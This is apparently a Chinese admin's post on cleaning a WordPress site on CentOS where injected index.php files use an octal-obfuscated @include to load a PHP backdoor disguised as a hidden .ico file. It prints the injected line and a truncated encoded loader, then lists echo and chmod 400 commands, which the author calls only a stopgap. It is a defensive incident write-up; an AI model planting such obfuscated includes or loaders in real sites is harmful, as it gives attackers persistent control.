几个目录莫名出现index.php,并且文件里面的内容如下(include 的路径用八进制转义做了混淆,解码后指向的就是下文找到的 wp-content/files/.32e69109.ico,一个伪装成图标的 PHP 文件):
<?php /*5155f*/ @include "\057da\164a/\167ww\162oo\164/w\145b/\167ww\056fu\156et\070.c\157m/\167p-\143on\164en\164/f\151le\163/.\0632e\06691\0609.\151co"; /*5155f*/
删掉文件过几天再次出现,应该是wordpress的漏洞导致的,不知道是插件的漏洞还是wordpress本身的漏洞。
删除文件后会像小强一样再次出现,所以改为修改文件的权限:找到被感染的文件,将文件的权限改成只读 400。这只是临时办法:文件属主(通常就是运行 PHP 的用户)仍然可以把权限改回去,所在目录可写时也能把文件删掉重建,根本上还是要找到写入这些文件的后门和被利用的漏洞。
我的服务器是centos7
进入wordpress的目录 目录:site
echo ""> ./site/index.php
echo ""> ./site/page.php
chmod 400 -R ./site
img里面是静态文件
# find ./img/ -name 'index.php'
# cat ./img/tui15-01-12/index.php
<?php /*5155f*/ @include "\057da\164a/\167ww\162oo\164/w\145b/\167ww\056fu\156et\070.c\157m/\167p-\143on\164en\164/f\151le\163/.\0632e\06691\0609.\151co"; /*5155f*/
# echo "hello world"> ./img/*/index.php
-bash: ./img/*/index.php: ambiguous redirect
将文件内容清空(重定向的目标不能是展开成多个文件的通配符,所以只能逐个文件处理):
echo "" > ./img/10baofu/index.php
echo "" > ./img/13apple/index.php
echo "" > ./img/2014/index.php
echo "" > ./img/2015ali-fj/index.php
echo "" > ./img/2015nba-jiezhi/index.php
echo "" > ./img/bf-low/index.php
echo "" > ./img/caipiao/index.php
echo "" > ./img/canren-gif/index.php
echo "" > ./img/china-dxjc/index.php
echo "" > ./img/china-viwe/index.php
echo "" > ./img/chuangyetaolu/index.php
echo "" > ./img/clonezilla-centos/index.php
echo "" > ./img/code-yuyan/index.php
echo "" > ./img/dakai-nao/index.php
echo "" > ./img/deguo-read/index.php
echo "" > ./img/egao-cxy/index.php
echo "" > ./img/guanlan/index.php
echo "" > ./img/HTTP_Status_Code/index.php
echo "" > ./img/jaychow-zhuanji/index.php
echo "" > ./img/jenkins/index.php
echo "" > ./img/kubisbz/gpjifxbt.php
echo "" > ./img/kubisbz/index.php
echo "" > ./img/linux/index.php
echo "" > ./img/nainai-dd/index.php
echo "" > ./img/ndong-gif/index.php
echo "" > ./img/qingzi-love/index.php
echo "" > ./img/qq-ali-work/index.php
echo "" > ./img/R720_system/index.php
echo "" > ./img/tiaoyuepic/index.php
echo "" > ./img/toulanzs/index.php
echo "" > ./img/tui14-10-26b/index.php
echo "" > ./img/tui15-01-12/index.php
echo "" > ./img/tui15-04-12/index.php
echo "" > ./img/vpn_windows/index.php
echo "" > ./img/weixin_bps/index.php
echo "" > ./img/xidada-gif/index.php
echo "" > ./img/xiee-logo/index.php
echo "" > ./img/yamaxun-gif/index.php
echo "" > ./img/yunweioneday/index.php
echo "" > ./img/zhexieci/index.php
echo "" > ./img/zhuangbi-men/index.php
修改文件权限:
chmod 400 ./img/10baofu/index.php
chmod 400 ./img/13apple/index.php
chmod 400 ./img/2014/index.php
chmod 400 ./img/2015ali-fj/index.php
chmod 400 ./img/2015nba-jiezhi/index.php
chmod 400 ./img/bf-low/index.php
chmod 400 ./img/caipiao/index.php
chmod 400 ./img/canren-gif/index.php
chmod 400 ./img/china-dxjc/index.php
chmod 400 ./img/china-viwe/index.php
chmod 400 ./img/chuangyetaolu/index.php
chmod 400 ./img/clonezilla-centos/index.php
chmod 400 ./img/code-yuyan/index.php
chmod 400 ./img/dakai-nao/index.php
chmod 400 ./img/deguo-read/index.php
chmod 400 ./img/egao-cxy/index.php
chmod 400 ./img/guanlan/index.php
chmod 400 ./img/HTTP_Status_Code/index.php
chmod 400 ./img/jaychow-zhuanji/index.php
chmod 400 ./img/jenkins/index.php
chmod 400 ./img/kubisbz/gpjifxbt.php
chmod 400 ./img/kubisbz/index.php
chmod 400 ./img/linux/index.php
chmod 400 ./img/nainai-dd/index.php
chmod 400 ./img/ndong-gif/index.php
chmod 400 ./img/qingzi-love/index.php
chmod 400 ./img/qq-ali-work/index.php
chmod 400 ./img/R720_system/index.php
chmod 400 ./img/tiaoyuepic/index.php
chmod 400 ./img/toulanzs/index.php
chmod 400 ./img/tui14-10-26b/index.php
chmod 400 ./img/tui15-01-12/index.php
chmod 400 ./img/tui15-04-12/index.php
chmod 400 ./img/vpn_windows/index.php
chmod 400 ./img/weixin_bps/index.php
chmod 400 ./img/xidada-gif/index.php
chmod 400 ./img/xiee-logo/index.php
chmod 400 ./img/yamaxun-gif/index.php
chmod 400 ./img/yunweioneday/index.php
chmod 400 ./img/zhexieci/index.php
chmod 400 ./img/zhuangbi-men/index.php
# find ./ -name ".*.ico"
./wp-content/files/.32e69109.ico
cat ./wp-content/files/.32e69109.ico
<?php $_no41yhg = basename/*m8k*/(/*z9c*/trim/*mc*/(/*s*/preg_replace/*50*/(/*x2f*/rawurldecode/*st2*/(/*qa7*/"%2F%5C%28.%2A%24%2F"/*458ix*/)/*x1lbe*/, '', __FILE__/*ac*/)/*bu*//*knaq2*/)/*di*//*u6*/)/*fd1uc*/;$_b4iwx = "GU%12M%17%5DTVP%40%0C%07G%09%40F%17SX%5CoZA%07%17%0AVGm%06D%5CPD%5C%0ENJF%24H8%01S_X%5E%5C%06N%10%1B%5CVS%08iZ%5E%5EMK%11%170MAW%04B%5C%11%17%15%0EXJT%24s%5B%0B_fBUM%06N%06%1D%5C%5C%40%3AZVV%17%15%0E%276%23b%1A%09%25_WXoJK%1DKHB%5CU%3ASKC_K%5DNOO%1E%1A%09%25_WXoJK%1DKHCRJ%3ASATSLZ%00%0C%01qG%5B%08S%1E%1D%10%09%07R%23%0A%5CA%5D%17iKT%40V%5C%1D%0A%01I%1B%02L%0DyBUMq%1D%0A%02Kl%5E%0C%5BPE%18%09%07R%0A%09%06%12V%00PP_U%5D%06K3%27~lw%2Az%1B%18%19BJ%0C%05%06%40V%1AGfqao%7Ca%25AC%0E%11n%0B%14%10%0AMPHIKNJVT%0CX%5CU%18%1EH%00%0F%0AqCG%11iZ%5E%5EMK%07%17%1C%0E%14%1BLM% ....
# echo "">./wp-content/files/.32e69109.ico
# chmod 400 ./wp-content/files/.32e69109.ico